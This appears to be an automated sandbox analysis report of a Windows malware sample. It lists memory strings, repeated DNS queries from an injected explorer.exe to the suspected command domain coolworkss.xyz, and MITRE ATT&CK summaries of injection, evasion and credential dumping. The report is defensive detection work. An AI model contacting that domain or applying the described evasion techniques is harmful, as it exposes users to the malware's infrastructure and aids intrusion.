Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pod.tst.eu/http://cvs.schmorp.de/libev/ev.pod#Be_smart_about_timeouts
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/5501711/3561
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://t2.symcb.com0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tl.symcd.com0&
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc3492#section-3.4
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wiki.commonjs.org/wiki/Unit_Testing/1.0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ecma-international.org/publications/standards/Ecma-262.htm)
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004F74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.freshaddress.biz/js/lib/freshaddress-client-7.0.min.js?token=6075cbbd36a1f0f92cddb595415
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217524808.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/luminateExtend/1.8.3/luminateExtend.min.js
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://codereview.chromium.org/121173009/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fca7603378a4e3ebeab2-4e03b1ac88f27f7b20b4cf232f717383.ssl.cf1.rackcdn.com/photos/social/land
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/antirez/linenoise
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/readable-stream/issues/16
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/1707
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/1726
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/2631
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://groups.google.com/forum/?pli=1#
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.imgur.com/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.imgur.com/2lsHcHC.png
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217524808.0000000000600000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.imgur.com/2lsHcHC.png;https://i.ibb.co/93gBLW7/1552130165.png
Source: lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.imgur.com/2lsHcHC.pnge
Source: explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rustih.ru/wp-content/uploads/2015/
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwf.org
Source: lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwf.org/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/03
Source: explorer.exe, 00000013.00000002.455198443.0000000003388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: explorer.exe, 00000013.00000002.455599716.0000000005C86000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=.net
Source: explorer.exe, 00000013.00000002.455599716.0000000005CAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455599716.0000000005C86000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8%26oq%3D.n
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.thawte.com/cps0/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.thawte.com/repository0
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/about/
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/about/contact
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/about/history
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/c
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/experts
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/leaders
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217524808.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/pages/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/pages/our-values
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/pages/privacy-policy
Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/pages/state-disclosures
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.worldwildlife.org/stories

Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	DNS query: coolworkss.xyz
Source:	DNS query: coolworkss.xyz

Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

